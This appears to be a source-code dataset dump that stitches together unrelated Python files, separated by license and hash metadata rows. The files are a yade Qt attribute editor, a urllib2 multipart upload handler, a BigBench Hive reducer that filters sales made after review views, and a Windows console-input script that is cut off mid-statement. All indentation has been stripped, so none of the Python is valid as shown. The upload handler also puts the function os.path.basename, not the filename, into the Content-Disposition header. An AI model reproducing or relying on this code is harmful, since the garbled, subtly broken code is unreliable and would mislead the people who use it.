'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []'
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.rows,self.cols=rows,cols
self.idxConverter=idxConverter
self.setContentsMargins(0,0,0,0)
self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=QSpinBox()
w.setRange(int(-1e9),int(1e9)); w.setSingleStep(1);
self.grid.addWidget(w,row,col);
self.refresh() # refresh before connecting signals!
for row,col in itertools.product(range(self.rows),range(self.cols)):
self.grid.itemAtPosition(row,col).widget().valueChanged.connect(self.update)
def refresh(self):
val=self.getter()
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=self.grid.itemAtPosition(row,col).widget().setValue(val[self.idxConverter(row,col)])
def update(self):
val=self.getter(); modified=False
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=self.grid.itemAtPosition(row,col).widget()
if w.value()!=val[self.idxConverter(row,col)]:
modified=True; val[self.idxConverter(row,col)]=w.value()
if not modified: return
logging.debug('setting'+str(val))
self.trySetter(val)
def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus()
class AttrEditor_Vector6i(AttrEditor_MatrixXi):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,6,lambda r,c:c)
class AttrEditor_Vector3i(AttrEditor_MatrixXi):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,3,lambda r,c:c)
class AttrEditor_Vector2i(AttrEditor_MatrixXi):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,2,lambda r,c:c)
class AttrEditor_Vector6(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,6,lambda r,c:c)
class AttrEditor_Vector3(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,3,lambda r,c:c)
class AttrEditor_Vector2(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,2,lambda r,c:c)
class AttrEditor_Matrix3(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,3,3,lambda r,c:(r,c))
class Se3FakeType: pass
_fundamentalEditorMap={bool:AttrEditor_Bool,str:AttrEditor_Str,int:AttrEditor_Int,float:AttrEditor_Float,Quaternion:AttrEditor_Quaternion,Vector2:AttrEditor_Vector2,Vector3:AttrEditor_Vector3,Vector6:AttrEditor_Vector6,Matrix3:AttrEditor_Matrix3,Vector6i:AttrEditor_Vector6i,Vector3i:AttrEditor_Vector3i,Vector2i:AttrEditor_Vector2i,Se3FakeType:AttrEditor_Se3}
_fundamentalInitValues={bool:True,str:'',int:0,float:0.0,Quaternion:Quaternion((0,1,0),0.0),Vector3:Vector3.Zero,Matrix3:Matrix3.Zero,Vector6:Vector6.Zero,Vector6i:Vector6i.Zero,Vector3i:Vector3i.Zero,Vector2i:Vector2i.Zero,Vector2:Vector2.Zero,Se3FakeType:(Vector3.Zero,Quaternion((0,1,0),0.0))}
class SerQLabel(QLabel):
def __init__(self,parent,label,tooltip,path):
QLabel.__init__(self,parent)
self.path=path
self.setText(label)
if tooltip or path: self.setToolTip(('<b>'+path+'</b><br>' if self.path else '')+(tooltip if tooltip else ''))
self.linkActivated.connect(yade.qt.openUrl)
def mousePressEvent(self,event):
if event.button()!=Qt.MidButton:
event.ignore(); return
# middle button clicked, paste pasteText to clipboard
cb=QApplication.clipboard()
cb.setText(self.path,mode=QClipboard.Clipboard)
cb.setText(self.path,mode=QClipboard.Selection) # X11 global selection buffer
event.accept()
class SerializableEditor(QFrame):
"Class displaying and modifying serializable attributes of a yade object."
import collections
import logging
# each attribute has one entry associated with itself
class EntryData:
def __init__(self,name,T,flags=0):
self.name,self.T,self.flags=name,T,flags
self.lineNo,self.widget=None,None
def __init__(self,ser,parent=None,ignoredAttrs=set(),showType=False,path=None):
"Construct window, *ser* is the object we want to show."
QtGui.QFrame.__init__(self,parent)
self.ser=ser
self.path=(ser.label if (hasattr(ser,'label') and ser.label) else path)
self.showType=showType
self.hot=False
self.entries=[]
self.ignoredAttrs=ignoredAttrs
logging.debug('New Serializable of type %s'%ser.__class__.__name__)
self.setWindowTitle(str(ser))
self.mkWidgets()
self.refreshTimer=QTimer(self)
self.refreshTimer.timeout.connect(self.refreshEvent)
self.refreshTimer.start(500)
def getListTypeFromDocstring(self,attr):
"Guess type of array by scanning docstring for :yattrtype: and parsing its argument; ugly, but works."
doc=getattr(self.ser.__class__,attr).__doc__
if doc==None:
logging.error("Attribute %s has no docstring."%attr)
return None
m=re.search(r':yattrtype:`([^`]*)`',doc)
if not m:
logging.error("Attribute %s does not contain :yattrtype:`....` (docstring is '%s'"%(attr,doc))
return None
cxxT=m.group(1)
logging.debug('Got type "%s" from :yattrtype:'%cxxT)
def vecTest(T,cxxT):
#regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(std\s*::)?\s*('+T+r')\s*>\s*$'
regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(shared_ptr\s*<\s*)?\s*(std\s*::)?\s*('+T+r')(\s*>)?\s*>\s*$'
m=re.match(regexp,cxxT)
return m
vecMap={
'bool':bool,'int':int,'long':int,'Body::id_t':long,'size_t':long,
'Real':float,'float':float,'double':float,
'Vector6r':Vector6,'Vector6i':Vector6i,'Vector3i':Vector3i,'Vector2r':Vector2,'Vector2i':Vector2i,
'Vector3r':Vector3,'Matrix3r':Matrix3,'Se3r':Se3FakeType,
'string':str,
#'BodyCallback':BodyCallback,
'IntrCallback':IntrCallback,'BoundFunctor':BoundFunctor,'IGeomFunctor':IGeomFunctor,'IPhysFunctor':IPhysFunctor,'LawFunctor':LawFunctor,'KinematicEngine':KinematicEngine,
'GlShapeFunctor':GlShapeFunctor,'GlStateFunctor':GlStateFunctor,'GlIGeomFunctor':GlIGeomFunctor,'GlIPhysFunctor':GlIPhysFunctor,'GlBoundFunctor':GlBoundFunctor,'GlExtraDrawer':GlExtraDrawer
}
for T,ret in vecMap.items():
if vecTest(T,cxxT):
logging.debug("Got type %s from cxx type %s"%(repr(ret),cxxT))
return (ret,)
logging.error("Unable to guess python type from cxx type '%s'"%cxxT)
return None
def mkAttrEntries(self):
if self.ser==None: return
try:
d=self.ser.dict()
except TypeError:
logging.error('TypeError when getting attributes of '+str(self.ser)+',skipping. ')
import traceback
traceback.print_exc()
attrs=self.ser.dict().keys(); attrs.sort()
for attr in attrs:
val=getattr(self.ser,attr) # get the value using serattr, as it might be different from what the dictionary provides (e.g. Body.blockedDOFs)
t=None
doc=getattr(self.ser.__class__,attr).__doc__;
if '|yhidden|' in doc: continue
if attr in self.ignoredAttrs: continue
if isinstance(val,list):
t=self.getListTypeFromDocstring(attr)
if not t and len(val)==0: t=(val[0].__class__,) # 1-tuple is list of the contained type
#if not t: raise RuntimeError('Unable to guess type of '+str(self.ser)+'.'+attr)
# hack for Se3, which is returned as (Vector3,Quaternion) in python
elif isinstance(val,tuple) and len(val)==2 and val[0].__class__==Vector3 and val[1].__class__==Quaternion: t=Se3FakeType
else: t=val.__class__
match=re.search(':yattrflags:`\s*([0-9]+)\s*`',doc) # non-empty attribute
flags=int(match.group(1)) if match else 0
#logging.debug('Attr %s is of type %s'%(attr,((t[0].__name__,) if isinstance(t,tuple) else t.__name__)))
self.entries.append(self.EntryData(name=attr,T=t))
def getDocstring(self,attr=None):
"If attr is *None*, return docstring of the Serializable itself"
doc=(getattr(self.ser.__class__,attr).__doc__ if attr else self.ser.__class__.__doc__)
if not doc: return ''
doc=re.sub(':y(attrtype|default|attrflags):`[^`]*`','',doc)
statAttr=re.compile('^.. ystaticattr::.*$',re.MULTILINE|re.DOTALL)
doc=re.sub(statAttr,'',doc) # static classes have their proper docs at the beginning, discard static memeber docs
# static: attribute of the type is the same object as attribute of the instance
# in that case, get docstring from the class documentation by parsing it
if attr and getattr(self.ser.__class__,attr)==getattr(self.ser,attr): doc=self.getStaticAttrDocstring(attr)
doc=re.sub(':yref:`([^`]*)`','\\1',doc)
import textwrap
wrapper=textwrap.TextWrapper(replace_whitespace=False)
return wrapper.fill(textwrap.dedent(doc))
def getStaticAttrDocstring(self,attr):
ret=''; c=self.ser.__class__
while hasattr(c,attr) and hasattr(c.__base__,attr): c=c.__base__
start='.. ystaticattr:: %s.%s('%(c.__name__,attr)
if start in c.__doc__:
ll=c.__doc__.split('\n')
for i in range(len(ll)):
if ll[i].startswith(start): break
for i in range(i+1,len(ll)):
if len(ll[i])>0 and ll[i][0] not in ' \t': break
ret+=ll[i]
return ret
else: return '[no documentation found]'
def mkWidget(self,entry):
if not entry.T: return None
# single fundamental object
Klass=_fundamentalEditorMap.get(entry.T,None)
getter,setter=lambda: getattr(self.ser,entry.name), lambda x: setattr(self.ser,entry.name,x)
if Klass:
widget=Klass(self,getter=getter,setter=setter)
widget.setFocusPolicy(Qt.StrongFocus)
if (entry.flags & AttrFlags.readonly): widget.setEnabled(False)
return widget
# sequences
if entry.T.__class__==tuple:
assert(len(entry.T)==1) # we don't handle tuples of other lenghts
# sequence of serializables
T=entry.T[0]
if (issubclass(T,Serializable) or T==Serializable):
widget=SeqSerializable(self,getter,setter,T,path=(self.path+'.'+entry.name if self.path else None),shrink=True)
return widget
if (T in _fundamentalEditorMap):
widget=SeqFundamentalEditor(self,getter,setter,T)
return widget
return None
# a serializable
if issubclass(entry.T,Serializable) or entry.T==Serializable:
obj=getattr(self.ser,entry.name)
if hasattr(obj,'label') and obj.label: path=obj.label
elif self.path: path=self.path+'.'+entry.name
else: path=None
widget=SerializableEditor(getattr(self.ser,entry.name),parent=self,showType=self.showType,path=(self.path+'.'+entry.name if self.path else None))
widget.setFrameShape(QFrame.Box); widget.setFrameShadow(QFrame.Raised); widget.setLineWidth(1)
return widget
return None
def mkWidgets(self):
self.mkAttrEntries()
grid=QFormLayout()
grid.setContentsMargins(2,2,2,2)
grid.setVerticalSpacing(0)
grid.setLabelAlignment(Qt.AlignRight)
if self.showType:
lab=SerQLabel(self,makeSerializableLabel(self.ser,addr=True,href=True),tooltip=self.getDocstring(),path=self.path)
lab.setFrameShape(QFrame.Box); lab.setFrameShadow(QFrame.Sunken); lab.setLineWidth(2); lab.setAlignment(Qt.AlignHCenter); lab.linkActivated.connect(yade.qt.openUrl)
grid.setWidget(0,QFormLayout.SpanningRole,lab)
for entry in self.entries:
entry.widget=self.mkWidget(entry)
objPath=(self.path+'.'+entry.name) if self.path else None
label=SerQLabel(self,serializableHref(self.ser,entry.name),tooltip=self.getDocstring(entry.name),path=objPath)
grid.addRow(label,entry.widget if entry.widget else QLabel('<i>unhandled type</i>'))
self.setLayout(grid)
self.refreshEvent()
def refreshEvent(self):
for e in self.entries:
if e.widget and not e.widget.hot: e.widget.refresh()
def refresh(self): pass
def makeSerializableLabel(ser,href=False,addr=True,boldHref=True,num=-1,count=-1):
ret=u''
if num>=0:
if count>=0: ret+=u'%d/%d. '%(num,count)
else: ret+=u'%d. '%num
if href: ret+=(u' <b>' if boldHref else u' ')+serializableHref(ser)+(u'</b> ' if boldHref else u' ')
else: ret+=ser.__class__.__name__+' '
if hasattr(ser,'label') and ser.label: ret+=u' “'+unicode(ser.label)+u'”'
# do not show address if there is a label already
elif addr:
import re
ss=unicode(ser); m=re.match(u'<(.*) instance at (0x.*)>',ss)
if m: ret+=m.group(2)
else: logging.warning(u"Serializable converted to str ('%s') does not contain 'instance at 0x…'"%ss)
return ret
class SeqSerializableComboBox(QFrame):
def __init__(self,parent,getter,setter,serType,path=None,shrink=False):
QFrame.__init__(self,parent)
self.getter,self.setter,self.serType,self.path,self.shrink=getter,setter,serType,path,shrink
self.layout=QVBoxLayout(self)
topLineFrame=QFrame(self)
topLineLayout=QHBoxLayout(topLineFrame);
for l in self.layout, topLineLayout: l.setSpacing(0); l.setContentsMargins(0,0,0,0)
topLineFrame.setLayout(topLineLayout)
buttons=(self.newButton,self.killButton,self.upButton,self.downButton)=[QPushButton(label,self) for label in (u'☘',u'☠',u'↑',u'↓')]
buttonSlots=(self.newSlot,self.killSlot,self.upSlot,self.downSlot) # same order as buttons
for b in buttons: b.setStyleSheet('QPushButton { font-size: 15pt; }'); b.setFixedWidth(30); b.setFixedHeight(30)
self.combo=QComboBox(self)
self.combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)
for w in buttons[0:2]+[self.combo,]+buttons[2:4]: topLineLayout.addWidget(w)
self.layout.addWidget(topLineFrame) # nested layout
self.scroll=QScrollArea(self); self.scroll.setWidgetResizable(True)
self.layout.addWidget(self.scroll)
self.seqEdit=None # currently edited serializable
self.setLayout(self.layout)
self.hot=None # API compat with SerializableEditor
self.setFrameShape(QFrame.Box); self.setFrameShadow(QFrame.Raised); self.setLineWidth(1)
# signals
for b,slot in zip(buttons,buttonSlots): b.clicked.connect(slot)
self.combo.currentIndexChanged.connect(self.comboIndexSlot)
self.refreshEvent()
# periodic refresh
self.refreshTimer=QTimer(self)
self.refreshTimer.timeout.connect(self.refreshEvent)
self.refreshTimer.start(1000) # 1s should be enough
#print 'SeqSerializable path is',self.path
def comboIndexSlot(self,ix): # different seq item selected
currSeq=self.getter();
if len(currSeq)==0: ix=-1
logging.debug('%s comboIndexSlot len=%d, ix=%d'%(self.serType.__name__,len(currSeq),ix))
self.downButton.setEnabled(ix<len(currSeq)-1)
self.upButton.setEnabled(ix>0)
self.combo.setEnabled(ix>=0)
if ix>=0:
ser=currSeq[ix]
self.seqEdit=SerializableEditor(ser,parent=self,showType=seqSerializableShowType,path=(self.path+'['+str(ix)+']') if self.path else None)
self.scroll.setWidget(self.seqEdit)
if self.shrink:
self.sizeHint=lambda: QSize(100,1000)
self.scroll.sizeHint=lambda: QSize(100,1000)
self.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding)
self.scroll.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding)
self.setMinimumHeight(min(300,self.seqEdit.height()+self.combo.height()+10))
self.setMaximumHeight(100000)
self.scroll.setMaximumHeight(100000)
else:
self.scroll.setWidget(QFrame())
if self.shrink:
self.setMaximumHeight(self.combo.height()+10);
self.scroll.setMaximumHeight(0)
def serLabel(self,ser,i=-1):
return ('' if i<0 else str(i)+'. ')+str(ser)[1:-1].replace('instance at ','')
def refreshEvent(self,forceIx=-1):
currSeq=self.getter()
comboEnabled=self.combo.isEnabled()
if comboEnabled and len(currSeq)==0: self.comboIndexSlot(-1) # force refresh, otherwise would not happen from the initially empty state
ix,cnt=self.combo.currentIndex(),self.combo.count()
# serializable currently being edited (which can be absent) or the one of which index is forced
ser=(self.seqEdit.ser if self.seqEdit else None) if forceIx<0 else currSeq[forceIx]
if comboEnabled and len(currSeq)==cnt and (ix<0 or ser==currSeq[ix]): return
if not comboEnabled and len(currSeq)==0: return
logging.debug(self.serType.__name__+' rebuilding list from scratch')
self.combo.clear()
if len(currSeq)>0:
prevIx=-1
for i,s in enumerate(currSeq):
self.combo.addItem(makeSerializableLabel(s,num=i,count=len(currSeq),addr=False))
if s==ser: prevIx=i
if forceIx>=0: newIx=forceIx # force the index (used from newSlot to make the new element active)
elif prevIx>=0: newIx=prevIx # if found what was active before, use it
elif ix>=0: newIx=ix # otherwise use the previous index (e.g. after deletion)
else: newIx=0 # fallback to 0
logging.debug('%s setting index %d'%(self.serType.__name__,newIx))
self.combo.setCurrentIndex(newIx)
else:
logging.debug('%s EMPTY, setting index 0'%(self.serType.__name__))
self.combo.setCurrentIndex(-1)
self.killButton.setEnabled(len(currSeq)>0)
def newSlot(self):
dialog=NewSerializableDialog(self,self.serType.__name__)
if not dialog.exec_(): return # cancelled
ser=dialog.result()
ix=self.combo.currentIndex()
currSeq=self.getter(); currSeq.insert(ix,ser); self.setter(currSeq)
logging.debug('%s new item created at index %d'%(self.serType.__name__,ix))
self.refreshEvent(forceIx=ix)
def killSlot(self):
ix=self.combo.currentIndex()
currSeq=self.getter(); del currSeq[ix]; self.setter(currSeq)
self.refreshEvent()
def upSlot(self):
i=self.combo.currentIndex()
assert(i>0)
currSeq=self.getter();
prev,curr=currSeq[i-1:i+1]; currSeq[i-1],currSeq[i]=curr,prev; self.setter(currSeq)
self.refreshEvent(forceIx=i-1)
def downSlot(self):
i=self.combo.currentIndex()
currSeq=self.getter(); assert(i<len(currSeq)-1);
curr,nxt=currSeq[i:i+2]; currSeq[i],currSeq[i+1]=nxt,curr; self.setter(currSeq)
self.refreshEvent(forceIx=i+1)
def refresh(self): pass # API compat with SerializableEditor
SeqSerializable=SeqSerializableComboBox
class NewFundamentalDialog(QDialog):
def __init__(self,parent,attrName,typeObj,typeStr):
QDialog.__init__(self,parent)
self.setWindowTitle('%s (type %s)'%(attrName,typeStr))
self.layout=QVBoxLayout(self)
self.scroll=QScrollArea(self)
self.scroll.setWidgetResizable(True)
self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel);
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.layout.addWidget(self.scroll)
self.layout.addWidget(self.buttons)
self.setWindowModality(Qt.WindowModal)
class FakeObjClass: pass
self.fakeObj=FakeObjClass()
self.attrName=attrName
Klass=_fundamentalEditorMap.get(typeObj,None)
initValue=_fundamentalInitValues.get(typeObj,typeObj())
setattr(self.fakeObj,attrName,initValue)
if Klass:
self.widget=Klass(None,self.fakeObj,attrName)
self.scroll.setWidget(self.widget)
self.scroll.show()
self.widget.refresh()
else: raise RuntimeError("Unable to construct new dialog for type %s"%(typeStr))
def result(self):
self.widget.update()
return getattr(self.fakeObj,self.attrName)
class NewSerializableDialog(QDialog):
def __init__(self,parent,baseClassName,includeBase=True):
import yade.system
QDialog.__init__(self,parent)
self.setWindowTitle('Create new object of type %s'%baseClassName)
self.layout=QVBoxLayout(self)
self.combo=QComboBox(self)
childs=list(yade.system.childClasses(baseClassName,includeBase=False)); childs.sort()
if includeBase:
self.combo.addItem(baseClassName)
self.combo.insertSeparator(1000)
self.combo.addItems(childs)
self.combo.currentIndexChanged.connect(self.comboSlot)
self.scroll=QScrollArea(self)
self.scroll.setWidgetResizable(True)
self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel);
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.layout.addWidget(self.combo)
self.layout.addWidget(self.scroll)
self.layout.addWidget(self.buttons)
self.ser=None
self.combo.setCurrentIndex(0); self.comboSlot(0)
self.setWindowModality(Qt.WindowModal)
def comboSlot(self,index):
item=str(self.combo.itemText(index))
self.ser=eval(item+'()')
self.scroll.setWidget(SerializableEditor(self.ser,self.scroll,showType=True))
self.scroll.show()
def result(self): return self.ser
def sizeHint(self): return QSize(180,400)
class SeqFundamentalEditor(QFrame):
def __init__(self,parent,getter,setter,itemType):
QFrame.__init__(self,parent)
self.getter,self.setter,self.itemType=getter,setter,itemType
self.layout=QVBoxLayout()
topLineFrame=QFrame(self); topLineLayout=QHBoxLayout(topLineFrame)
self.form=QFormLayout()
self.form.setContentsMargins(0,0,0,0)
self.form.setVerticalSpacing(0)
self.form.setLabelAlignment(Qt.AlignLeft)
self.formFrame=QFrame(self); self.formFrame.setLayout(self.form)
self.layout.addWidget(self.formFrame)
self.setLayout(self.layout)
# SerializableEditor API compat
self.hot=False
self.rebuild()
# periodic refresh
self.refreshTimer=QTimer(self)
self.refreshTimer.timeout.connect(self.refreshEvent)
self.refreshTimer.start(1000) # 1s should be enough
def contextMenuEvent(self, event):
index=self.localPositionToIndex(event.pos())
seq=self.getter()
if len(seq)==0: index=-1
field=self.form.itemAt(index,QFormLayout.LabelRole).widget() if index>=0 else None
menu=QMenu(self)
actNew,actKill,actUp,actDown=[menu.addAction(name) for name in (u'☘ New',u'☠ Remove',u'↑ Up',u'↓ Down')]
if index<0: [a.setEnabled(False) for a in actKill,actUp,actDown]
if index==len(seq)-1: actDown.setEnabled(False)
if index==0: actUp.setEnabled(False)
if field: field.setStyleSheet('QWidget { background: green }')
act=menu.exec_(self.mapToGlobal(event.pos()))
if field: field.setStyleSheet('QWidget { background: none }')
if not act: return
if act==actNew: self.newSlot(index)
elif act==actKill: self.killSlot(index)
elif act==actUp: self.upSlot(index)
elif act==actDown: self.downSlot(index)
def localPositionToIndex(self,pos):
gp=self.mapToGlobal(pos)
for row in range(self.form.count()/2):
w,i=self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole)
for wi in w.widget(),i.widget():
x0,y0,x1,y1=wi.geometry().getCoords(); globG=QRect(self.mapToGlobal(QPoint(x0,y0)),self.mapToGlobal(QPoint(x1,y1)))
if globG.contains(gp):
return row
return -1
def newSlot(self,i):
seq=self.getter();
seq.insert(i,_fundamentalInitValues.get(self.itemType,self.itemType()))
self.setter(seq)
self.rebuild()
def killSlot(self,i):
seq=self.getter(); assert(i<len(seq)); del seq[i]; self.setter(seq)
self.refreshEvent()
def upSlot(self,i):
seq=self.getter(); assert(i<len(seq));
prev,curr=seq[i-1:i+1]; seq[i-1],seq[i]=curr,prev; self.setter(seq)
self.refreshEvent(forceIx=i-1)
def downSlot(self,i):
seq=self.getter(); assert(i<len(seq)-1);
curr,nxt=seq[i:i+2]; seq[i],seq[i+1]=nxt,curr; self.setter(seq)
self.refreshEvent(forceIx=i+1)
def rebuild(self):
currSeq=self.getter()
# clear everything
rows=self.form.count()/2
for row in range(rows):
logging.trace('counts',self.form.rowCount(),self.form.count())
for wi in self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole):
self.form.removeItem(wi)
logging.trace('deleting widget',wi.widget())
widget=wi.widget(); widget.hide(); del widget # for some reason, deleting does not make the thing disappear visually; hiding does, however
logging.trace('counts after ',self.form.rowCount(),self.form.count())
logging.debug('cleared')
# add everything
Klass=_fundamentalEditorMap.get(self.itemType,None)
if not Klass:
errMsg=QTextEdit(self)
errMsg.setReadOnly(True); errMsg.setText("Sorry, editing sequences of %s's is not (yet?) implemented."%(self.itemType.__name__))
self.form.insertRow(0,'<b>Error</b>',errMsg)
return
class ItemGetter():
def __init__(self,getter,index): self.getter,self.index=getter,index
def __call__(self): return self.getter()[self.index]
class ItemSetter():
def __init__(self,getter,setter,index): self.getter,self.setter,self.index=getter,setter,index
def __call__(self,val): seq=self.getter(); seq[self.index]=val; self.setter(seq)
for i,item in enumerate(currSeq):
widget=Klass(self,ItemGetter(self.getter,i),ItemSetter(self.getter,self.setter,i)) #proxy,'value')
self.form.insertRow(i,'%d. '%i,widget)
logging.debug('added item %d %s'%(i,str(widget)))
if len(currSeq)==0: self.form.insertRow(0,'<i>empty</i>',QLabel('<i>(right-click for menu)</i>'))
logging.debug('rebuilt, will refresh now')
self.refreshEvent(dontRebuild=True) # avoid infinite recursion it the length would change meanwhile
def refreshEvent(self,dontRebuild=False,forceIx=-1):
currSeq=self.getter()
if len(currSeq)!=self.form.count()/2: #rowCount():
if dontRebuild: return # length changed behind our back, just pretend nothing happened and update next time instead
self.rebuild()
currSeq=self.getter()
for i in range(len(currSeq)):
item=self.form.itemAt(i,QFormLayout.FieldRole)
logging.trace('got item #%d %s'%(i,str(item.widget())))
widget=item.widget()
if not widget.hot:
widget.refresh()
if forceIx>=0 and forceIx==i: widget.setFocus()
def refresh(self): pass # SerializableEditor API
|
gpl-2.0
| -7,651,492,641,948,851,000
| 44.41601
| 360
| 0.727223
| false
| 2.92437
| false
| false
| false
|
donaldharvey/snappy
|
snappy/utils.py
|
1
|
2623
|
import urllib2
import urllib
import os
from mimetools import choose_boundary
from mimetypes import guess_type
import stat
class Singleton(type):
def __init__(self, name, bases, dict):
super(Singleton, self).__init__(name, bases, dict)
self.instance = None
def __call__(self, *args, **kw):
if self.instance is None:
self.instance = super(Singleton, self).__call__(*args, **kw)
return self.instance
class MultipartDataHandler(urllib2.BaseHandler):
"""
A urllib2-based multipart/form-data poster, adapted slightly from
http://odin.himinbi.org/MultipartPostHandler.py and
http://code.activestate.com/recipes/146306/.
"""
handler_order = urllib2.HTTPHandler.handler_order - 20
def http_request(self, request):
data = request.get_data()
if data is not None and data is not str:
fields, files = [], []
for key, value in data.items():
if type(value) == file:
files.append((key, value))
else:
fields.append((key, value))
if not len(files):
# no files, so go straight ahead and encode the data
data = urllib.urlencode(fields, True)
else:
content_type, data = self._encode_multipart_formdata(fields, files)
req_content_type = request.get_header('Content-Type', '')
if 'multipart/form-data' in req_content_type:
request.set_header('Content-Type', content_type)
else:
request.add_unredirected_header('Content-Type', content_type)
request.add_data(data)
return request
https_request = http_request
def _encode_multipart_formdata(self, fields, files):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, filename, value) elements for data to be uploaded as files
Return (content_type, body) ready for httplib.HTTP instance
"""
boundary = choose_boundary()
CRLF = '\r\n'
L = []
for (key, value) in fields:
L.append('--' + boundary)
L.append('Content-Disposition: form-data; name="%s"' % str(key))
L.append('')
L.append(str(value))
for (key, fd) in files:
L.append('--' + boundary)
filename = os.path.basename(fd.name)
filesize = os.fstat(fd.fileno())[stat.ST_SIZE]
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (str(key), str(os.path.basename)))
mimetype = guess_type(filename)[0] or 'application/octet-stream'
L.append('Content-Type: %s' % mimetype)
L.append('Content-Length: %s' % filesize)
L.append('')
fd.seek(0)
L.append(fd.read())
L.append('--' + boundary + '--')
L.append('')
body = CRLF.join(L)
contenttype = 'multipart/form-data; boundary=%s' % boundary
return contenttype, body
|
gpl-3.0
| 9,019,982,423,787,834,000
| 32.202532
| 107
| 0.676706
| false
| 3.156438
| false
| false
| false
|
intel-hadoop/Big-Data-Benchmark-for-Big-Bench
|
engines/hive/queries/q08/q08_filter_sales_with_reviews_viewed_before.py
|
1
|
3144
|
#"INTEL CONFIDENTIAL"
#Copyright 2016 Intel Corporation All Rights Reserved.
#
#The source code contained or described herein and all documents related to the source code ("Material") are owned by Intel Corporation or its suppliers or licensors. Title to the Material remains with Intel Corporation or its suppliers and licensors. The Material contains trade secrets and proprietary and confidential information of Intel or its suppliers and licensors. The Material is protected by worldwide copyright and trade secret laws and treaty provisions. No part of the Material may be used, copied, reproduced, modified, published, uploaded, posted, transmitted, distributed, or disclosed in any way without Intel's prior express written permission.
#
#No license under any patent, copyright, trade secret or other intellectual property right is granted to or conferred upon you by disclosure or delivery of the Materials, either expressly, by implication, inducement, estoppel or otherwise. Any license under such intellectual property rights must be express and approved by Intel in writing.
import sys
import logging
import traceback
import os
import time
from time import strftime
web_page_type_filter=sys.argv[1]
seconds_before_sale_filter = long(sys.argv[2])
if __name__ == "__main__":
line = ''
try:
current_key = ''
last_review_date=-1
#sales_sk should be distinct
last_sales_sk = ''
#expects input to be partitioned by uid and sorted by date_sk (and timestamp) ascending
for line in sys.stdin:
# lustered by wcs_user_sk and by wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type ascending in this order => ensured by hive
wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type = line.strip().split("\t")
#reset on partition change
if current_key != wcs_user_sk :
current_key = wcs_user_sk
last_review_date = -1
last_sales_sk = ''
tstamp_inSec = long(tstamp_inSec_str)
#found review before purchase, save last review date
if wp_type == web_page_type_filter:
last_review_date = tstamp_inSec
continue
#if we encounter a sold item ( wcs_sales_sk.isdigit() => valid non null value) and a user looked at a review within 'seconds_before_sale_filter' => print found sales_sk backt to hive
#if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() : #version with duplicate sales_sk's
if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() and last_sales_sk != wcs_sales_sk : #version reduced duplicate sales_sk's
last_sales_sk = wcs_sales_sk
print wcs_sales_sk
except:
## should only happen if input format is not correct, like 4 instead of 5 tab separated values
logging.basicConfig(level=logging.DEBUG, filename=strftime("/tmp/bigbench_q8_reducer_%Y%m%d-%H%M%S.log"))
logging.info('web_page_type_filter: ' + web_page_type_filter )
logging.info('seconds_before_sale_filter: ' + seconds_before_sale_filter )
logging.info("line from hive: \"" + line + "\"")
logging.exception("Oops:")
raise
sys.exit(1)
|
apache-2.0
| -7,692,260,263,573,723,000
| 51.4
| 663
| 0.735687
| false
| 3.409978
| false
| false
| false
|
viswimmer1/PythonGenerator
|
data/python_files/34574373/cmss.py
|
1
|
2623
|
import win32pipe
import win32console
import win32process
import time
import win32con
import codecs
import ctypes
user32 = ctypes.windll.user32
CONQUE_WINDOWS_VK = {
'3' : win32con.VK_CANCEL,
'8' : win32con.VK_BACK,
'9' : win32con.VK_TAB,
'12' : win32con.VK_CLEAR,
'13' : win32con.VK_RETURN,
'17' : win32con.VK_CONTROL,
'20' : win32con.VK_CAPITAL,
'27' : win32con.VK_ESCAPE,
'28' : win32con.VK_CONVERT,
'35' : win32con.VK_END,
'36' : win32con.VK_HOME,
'37' : win32con.VK_LEFT,
'38' : win32con.VK_UP,
'39' : win32con.VK_RIGHT,
'40' : win32con.VK_DOWN,
'45' : win32con.VK_INSERT,
'46' : win32con.VK_DELETE,
'47' : win32con.VK_HELP
}
def make_input_key(c, control_key_state=None):
kc = win32console.PyINPUT_RECORDType (win32console.KEY_EVENT)
kc.KeyDown = True
kc.RepeatCount = 1
cnum = ord(c)
if cnum == 3:
pid_list = win32console.GetConsoleProcessList()
win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0)
return
else:
kc.Char = unicode(c)
if str(cnum) in CONQUE_WINDOWS_VK:
